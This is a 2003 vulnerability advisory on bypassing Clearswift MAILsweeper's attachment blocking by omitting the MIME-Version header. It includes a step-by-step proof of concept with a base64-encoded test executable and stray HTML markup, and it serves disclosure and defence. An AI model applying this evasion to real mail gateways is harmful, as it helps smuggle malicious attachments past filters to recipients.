Reported March 3, 2003, by Martin O’Neal.

 

 

VERSIONS AFFECTED

 

  • Clearswift MAILsweeper 4.x for Windows NT/2000

 

DESCRIPTION

 

<span style="font-family:Verdana">A vulnerability exists in Clearswift’s MAILsweeper 4.x that could result in the bypass of the attachment blocking feature on the vulnerable server. If a deliberately malformed MIME encapsulation technique is used, then the MAILsweeper product will not recognize the attachment and allows it to pass.<p></p>
</h3>

 

DEMONSTRATION

 

The discover posted the following steps as proof of concept:

 

-- Proof of concept --
 <p></p>
For this proof of concept, the MIME encapsulation is simply modified to remove the MIME-Version header field. An example of an application that will process a MIME construct that is malformed in this way is Microsoft Internet Explorer.
 <p></p>
Whilst RFC2045 states that all agents must include this field \[2\] it then goes on to say that "In the absence of a MIME-Version field, a receiving mail user agent (whether conforming to MIME requirements or not) may optionally choose to interpret the body of the message according to local conventions."
 <p></p>
Step 1: On the MAILsweeper host create a new Data Type Manager with only the Executable type selected. Save and restart the MAILsweeper Security service.
 <p></p>
Step 2: Now create a text file that will be used to hold the MIME encoded attachment. Start notepad (or another text editor), and paste in:
 <p></p>
<span style="mso-spacerun: yes">     </h3>MIME-Version: 1.0 <span style="mso-spacerun: yes">     </h3>Content-Location:file:///executable.exe <span style="mso-spacerun: yes">     </h3>Content-Transfer-Encoding: base64
 <p></p>
<span style="mso-spacerun: yes">     </h3>TVp0AQIAAAAgAAgA//8YAIAAAAAQAAIAHgAAAAEAAAAAA <span style="mso-spacerun: yes">     </h3>AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA <span style="mso-spacerun: yes">     </h3>AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA <span style="mso-spacerun: yes">     </h3>AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA <span style="mso-spacerun: yes">     </h3>AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA <span style="mso-spacerun: yes">     </h3>AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA <span style="mso-spacerun: yes">     </h3>AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA <span style="mso-spacerun: yes">     </h3>AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA <span style="mso-spacerun: yes">     </h3>AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA <span style="mso-spacerun: yes">     </h3>AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA <span style="mso-spacerun: yes">     </h3>AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA <span style="mso-spacerun: yes">     </h3>AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA <span style="mso-spacerun: yes">     </h3>AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA <span style="mso-spacerun: yes">     </h3>AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA <span style="mso-spacerun: yes">     </h3>AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA <span style="mso-spacerun: yes">     </h3>AAAAAAAC4AQCO2I0WAgC0Cc0huCBMzSFFeGUhJCQJALH/ <span style="mso-spacerun: yes">     </h3>/////wAAAAAAAFQBAAAAAAIAUkKL6IzABRAADh+jBAADB <span style="mso-spacerun: yes">     </h3>gwAjsCLDgYAi/lPi/f986RQuDQAUMuMw4zYSI7YjsC/Dw <span style="mso-spacerun: yes">     </h3>C5EACw//OuR4v3i8NIjsC/DwCxBIvG99DT6IzaK9BzBIz <span style="mso-spacerun: yes">     </h3>YK9LT4APwjtqLx/fQ0+iMwivQcwSMwCvS0+AD+I7CrIrQ <span style="mso-spacerun: yes">     </h3>Tq2LyEaKwiT+PLB1BazzqusGPLJ1bfOkisKoAXSxvjIBD  <span style="mso-spacerun: yes">    </h3>h+LHgQA/DPSrYvI4xOLwgPDjsCti/iD//90ESYBHeLzgf <span style="mso-spacerun: yes">     </h3>oA8HQWgcIAEOvcjMBAjsCD7xAmAR1IjsDr4ovDiz4IAIs <span style="mso-spacerun: yes">     </h3>2CgAD8AEGAgAtEACO2I7AuwAA+o7Wi+f7i8Uu/y+0QLsC <span style="mso-spacerun: yes">     </h3>ALkWAIzKjtq6HAHNIbj/TM0hUGFja2VkIGZpbGUgaXMgY <span style="mso-spacerun: yes">     </h3>29ycnVwdAEAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA <span style="mso-spacerun: yes">     </h3>AAAAAAAAA=
 <p></p>
Step 3: To reproduce this issue, send an email containing the attachment created in step 2 that will be processed by the scenario from step 1. This should result in a successful discovery condition.
 <p></p>
Step 4: Reopen the attachment from step 2 and remove the first line (MIME-Version: 1.0), then resend the attachment as per step 3. This should result in the attachment not being spotted as an executable.

 

VENDOR RESPONSE

 

<span style="font-family:Verdana">The vendor, <a href="http://www.clearswift.com/">Clearswift</a>, has made an <a href="http://www.clearswift.com/support/threatlab/vbstool.asp">updated script utility</a> available that can detect the malformed MIME header used in this vulnerability. As a workaround, this should be implemented until a fix or patch is available.<p></p>
</h3>

 

 

CREDIT          

Discovered by Martin O'Neal.